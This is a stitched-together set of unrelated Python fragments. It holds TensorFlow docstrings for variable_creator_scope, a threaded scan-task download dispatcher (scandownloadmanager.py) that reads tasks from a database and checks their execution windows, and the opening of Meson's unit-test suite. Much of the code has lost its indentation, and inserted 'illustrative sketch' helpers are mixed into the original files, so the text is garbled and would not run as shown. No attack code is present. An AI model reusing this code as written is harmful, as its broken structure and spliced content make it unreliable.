on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
use_resource: if True, a ResourceVariable is always created.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
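# A minimal usage sketch for the scope above; `prefixing_creator` is a
# hypothetical creator that tags the variable name before delegating to the
# next creator in line.
def _example_variable_creator_scope():
  def prefixing_creator(next_creator, **kwargs):
    kwargs["name"] = "tagged_" + (kwargs.get("name") or "Variable")
    return next_creator(**kwargs)
  with variable_creator_scope_v1(prefixing_creator):
    return variable(1.0, name="w")  # the variable is created as "tagged_w"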
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
A creator that wants to create a variable is supposed to eventually call
next_creator, rather than calling Variable or ResourceVariable directly.
This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important that the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
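# --- Illustrative sketch (added for exposition, not part of the original
# module): a minimal creator that logs the requested variable name and then
# defers to the next creator so the chain stays composable. It assumes the
# `variable_creator_scope` defined above and a `Variable` class available in
# this module's namespace.
def _example_logging_creator(next_creator, **kwargs):
  """Logs the name of the variable being created, then defers."""
  print("creating variable:", kwargs.get("name"))
  return next_creator(**kwargs)
# Hypothetical usage:
#   with variable_creator_scope(_example_logging_creator):
#     v = Variable(1.0, name="counter")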
|
scandownloadmanager.py
|
"""
Download dispatching for iscan tasks.
"""
import threading
import time
import traceback
from datetime import datetime
from queue import PriorityQueue
import pytz
from datacontract import IdownCmd, ETaskStatus, IscanTask, ECommandStatus
from idownclient.config_task import clienttaskconfig
from .scanmanagebase import ScanManageBase
from .scanplugmanager import ScanPlugManager
from ..clientdbmanager.sqlcondition import ESqlComb, SqlCondition, SqlConditions
class ScanDownloadManager(ScanManageBase):
def __init__(self):
ScanManageBase.__init__(self)
# Queue of new tasks
self._new_scantask_queue = PriorityQueue()
# Tasks currently being processed
self._dealing_queue: dict = {}
# Lock for the dealing queue; while new tasks are being handled, recurring download tasks are not executed
self._dealing_queue_locker = threading.Lock()
# Number of concurrent queue tasks
self._concur_num = clienttaskconfig.concurrent_number
# Default configuration
_defaultcmd: str = self._sqlfunc.get_default_iscan_cmd().get("cmd")
self.d_cmd = IdownCmd(_defaultcmd)
self._scan_plug_manger = ScanPlugManager()
def on_task_complete(self, task: IscanTask):
"""Task对象处理完毕的回调"""
with self._dealing_queue_locker:
if task.taskid in self._dealing_queue:
self._dealing_queue.pop(task.taskid, None)
def _process_task_execution_time(self, q_task: dict):
"""
Process data freshly queried from the database: check whether the task is
still within its validity period and whether it is inside its execution
time window.
Known issue: a task may be within its execution window on the server side
but no longer be within it once it reaches the client. The server was
therefore extended to check whether a periodic task is inside its execution
window and to stop dispatching it when it is not, while the client always
finishes the last period regardless.
modify by judy 20201126
:param q_task:
:return:
"""
q_cmdid = q_task.get("cmdid")
is_effective = True
if q_cmdid is None or q_cmdid == "":
# Returning True here means a default task carries no activity or time restrictions
# That is how it looks for now; adjust later if problems come up in use, judy190603
return True
cmd = IdownCmd(q_task.get("cmd"))
# The settings stored with the task may be incomplete, so fill them in with the defaults
cmd.fill_defcmd(self.d_cmd)
# An iscantask also supports periodic execution as well as pausing a period, but the scanner has no resume-download feature, so pausing suspends not only the current download but the whole period
# Therefore, if the field shows the task has been paused, do not download any further. modify by judy 2020/07/23
if int(cmd.switch_control.download_switch) != 1:
# A paused task does not need to run again, but the database status must be updated and the status reported back to the server
return False
# Key-area scan: a periodic task is executed directly; there is no execution window, only a validity period. modify by judy 20201126
if int(cmd.stratagy.circulation_mode) == 2:
return True
# Every task checks the concurrency limit
if int(cmd.stratagy.concur_num) != self._concur_num:
self._concur_num = int(cmd.stratagy.concur_num)
# Use UTC+8 (Asia/Shanghai) time throughout
beijing = pytz.timezone("Asia/Shanghai")
now_datetime = datetime.now(beijing)
now_time = now_datetime.time()
try:
if cmd.stratagy.time_start is not None:
task_time_start = datetime.strptime(
cmd.stratagy.time_start, "%Y-%m-%d %H:%M:%S"
)
if now_datetime >= beijing.localize(task_time_start):
is_effective = True
else:
return False
if cmd.stratagy.time_end is not None:
task_time_end = datetime.strptime(
cmd.stratagy.time_end, "%Y-%m-%d %H:%M:%S"
)
if now_datetime <= beijing.localize(task_time_end):
is_effective = True
else:
return False
# ---------------------------------------------- The checks above determine whether the task is within its validity period
# if len(cmd.stratagy.period) == 0:
# return is_effective
# for t_p in cmd.stratagy.period:
# t_p_list = t_p.split("-")
# if (
# datetime.strptime(t_p_list[0], "%H:%M:%S").time()
# <= now_time
# <= datetime.strptime(t_p_list[1], "%H:%M:%S").time()
# ):
# is_effective = True
# break
# else:
# is_effective = False
# --------------------------------------------- The checks above determine whether the task is within its execution window
except:
self._logger.error(
f"Determine the effective and execution time of the task error, err:{traceback.format_exc()}"
)
return is_effective
def _get_new_iscantask(self):
"""
Settings are not taken into account for now; it is unclear whether recurring downloads are needed.
:return:
"""
new_task_list = []
result_list = []
try:
with self._dealing_queue_locker:
new_task = self._sqlfunc.query_iscan_task(
SqlConditions(
SqlCondition(
colname="taskstatus",
val=ETaskStatus.New.value,
comb=ESqlComb.Or,
),
SqlCondition(
colname="taskstatus",
val=ETaskStatus.WaitForDeal.value,
comb=ESqlComb.Or,
),
# SqlCondition(
# colname='taskstatus',
# val=ETaskStatus.Logining.value,
# comb=ESqlComb.Or),
SqlCondition(
colname="taskstatus",
val=ETaskStatus.Downloading.value,
comb=ESqlComb.Or,
),
)
)
if len(new_task) > 0:
for t_a in new_task:
# Check whether the task may run now: both its validity period and its execution time window
if self._process_task_execution_time(t_a):
new_task_list.append(t_a)
else:
try:
pause_task = self._construct_task(t_a)
if pause_task.cmd.switch_control.download_switch == 0:
# The task has been paused, so update its status and report back to the server
self._sqlfunc.update_iscan_status(
"taskstatus",
ETaskStatus.TemporarilyStop.value,
pause_task.taskid,
)
self._sqlfunc.update_iscan_status(
"sequence",
pause_task._sequence,
pause_task.taskid,
)
self.write_iscanback(
pause_task, ECommandStatus.Cancelled, "The task has been paused"
)
self._logger.info(
f"Mission suspended successfully, taskid:{pause_task.taskid}"
)
continue
except Exception:
self._logger.error(
"Construct task from dict error: {}".format(
traceback.format_exc()
)
)
for dic in new_task_list:
if not isinstance(dic, dict):
continue
# Construct the Task
task: IscanTask = None
try:
task = self._construct_task(dic)
except Exception:
self._logger.error(
"Construct task from dict error: {}".format(
traceback.format_exc()
)
)
if not isinstance(task, IscanTask):
continue
# Validate the Task
if not isinstance(task.taskid, str) or task.taskid == "":
continue
# Once the download conditions are met, immediately check for duplicates
if task.taskid in self._dealing_queue:
continue
# Mark the task as waiting to be processed
task.taskstatus = ETaskStatus.WaitForDeal
# Update the task status in the database
self._sqlfunc.update_iscan_status(
"taskstatus", task.taskstatus.value, task.taskid
)
# Put the unique task into the deduplication dictionary
self._dealing_queue[task.taskid] = task
result_list.append(task)
except:
self._logger.error(
f"Select executable iscan tasks error, err:{traceback.format_exc()}"
)
return result_list
def _construct_task(self, filedata: dict) -> IscanTask:
"""
Construct an IscanTask from a dict.
:param filedata:
:return:
"""
tsk: IscanTask = IscanTask(filedata)
tsk.priority = tsk.cmd.stratagy.priority
tsk.on_complete = self.on_task_complete
return tsk
def _put_task_to_queue(self, tsk: IscanTask, queue: PriorityQueue):
"""
Generic method for putting a task into a queue.
:param tsk:
:param queue:
:return:
"""
if not isinstance(tsk, IscanTask):
raise Exception("Invalid Task")
# Maximum number of simultaneous download tasks; high-priority tasks are handled directly
# A downloading task may take a long time, so sleeping a few seconds per cycle is enough
queue.put(tsk)
self.write_iscanback(tsk, ECommandStatus.Dealing, "Task added to the download queue; waiting for execution")
self._logger.debug(f"Put an iscan task to queue\ntaskid:{tsk.taskid}")
return
def put_new_iscantask(self):
"""
Put new iscantasks into the queue.
:return:
"""
while True:
new_tasks = self._get_new_iscantask()
if len(new_tasks) == 0:
# No new tasks; sleep briefly before scanning the database again
time.sleep(1)
continue
try:
for filedata in new_tasks:
self._put_task_to_queue(filedata, self._new_scantask_queue)
except:
self._logger.error(
f"Make the task from sqlite wrong, err:{traceback.format_exc()}"
)
finally:
# Because there are recurring tasks, rescan the database periodically
# Note: deduplication cannot be done here
time.sleep(0.5)
def execute_new_iscantask(self):
"""
Continuously take tasks from the new-task queue and download their data.
:return:
"""
got = False
while True:
if self._new_scantask_queue.empty():
time.sleep(1)
continue
got = False
tsk: IscanTask = self._new_scantask_queue.get()
got = True
self._logger.info(
f"Task start: {tsk.taskid}, scantype:{tsk.scantype.value}"
)
try:
# Visit the target site according to the settings in cmd and crawl the corresponding data
self._scan_plug_manger.iscandownload(tsk)
except:
self._logger.error(
f"Execute iscantask error, err:{traceback.format_exc()}"
)
finally:
if got:
self._new_scantask_queue.task_done()
def start(self):
"""
Start task execution on multiple threads.
:return:
"""
thread1 = threading.Thread(target=self.put_new_iscantask, name="iscantaskscan")
thread2 = threading.Thread(
target=self.execute_new_iscantask, name="iscantaskexecute"
)
thread1.start()
thread2.start()
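# Illustrative usage sketch (not part of the original module): construct the
# manager and launch its two worker threads. This assumes the idownclient
# configuration and database layer imported above are available at runtime.
if __name__ == "__main__":
    ScanDownloadManager().start()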
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import typing as T
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
import zipfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg, relpath, is_linux
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target, ConfigurationData
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
curdir = os.getcwd()
os.chdir(path)
yield
os.chdir(curdir)
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
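# Illustrative example (not part of the original test suite): decorating a
# function with skipIfNoExecutable makes it raise unittest.SkipTest at call
# time when the named tool is missing from PATH. The function below is
# hypothetical and never invoked by the suite.
@skipIfNoExecutable('readelf')
def _example_requires_readelf():
    pass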
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
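# Illustrative sketch (not part of the original test suite): temp_filename()
# yields a path to an empty scratch file that is removed on exit. The helper
# below is hypothetical and never invoked by the suite.
def _example_temp_filename_usage():
    with temp_filename() as fname:
        with open(fname, 'w') as f:
            f.write('scratch data')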
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
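# Illustrative sketch (not part of the original test suite): inside the
# no_pkgconfig() block, lookups of pkg-config through shutil.which appear to
# fail, which lets tests exercise their fallback code paths. The helper below
# is hypothetical and never invoked by the suite.
def _example_without_pkgconfig():
    with no_pkgconfig():
        assert shutil.which('pkg-config') is None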
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10.128'), '2016.10.128')
self.assertEqual(searchfunc('2016.10'), '2016.10')
self.assertEqual(searchfunc('2016.10 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('oops v1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.oops 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.x'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class_none_flush(self):
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
a = cc.compiler_args(['-I.'])
# First we check that the tree construction deduplicates the correct -I argument
a += ['-I..']
a += ['-I./tests/']
a += ['-I./tests2/']
# Think of the following as an assertion; we cannot apply it, otherwise the CompilerArgs would already flush the changes:
# assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..', '-I.'])
a += ['-I.']
a += ['-I.', '-I./tests/']
self.assertEqual(a, ['-I.', '-I./tests/', '-I./tests2/', '-I..'])
# Then we check that, when CompilerArgs already holds a built container list, the deduplication picks the correct one
a += ['-I.', '-I./tests2/']
self.assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..'])
def test_compiler_args_class(self):
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
# Test that empty initialization works
a = cc.compiler_args()
self.assertEqual(a, [])
# Test that list initialization works
a = cc.compiler_args(['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cc.compiler_args(['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-lfoo is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = gcc.compiler_args(['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
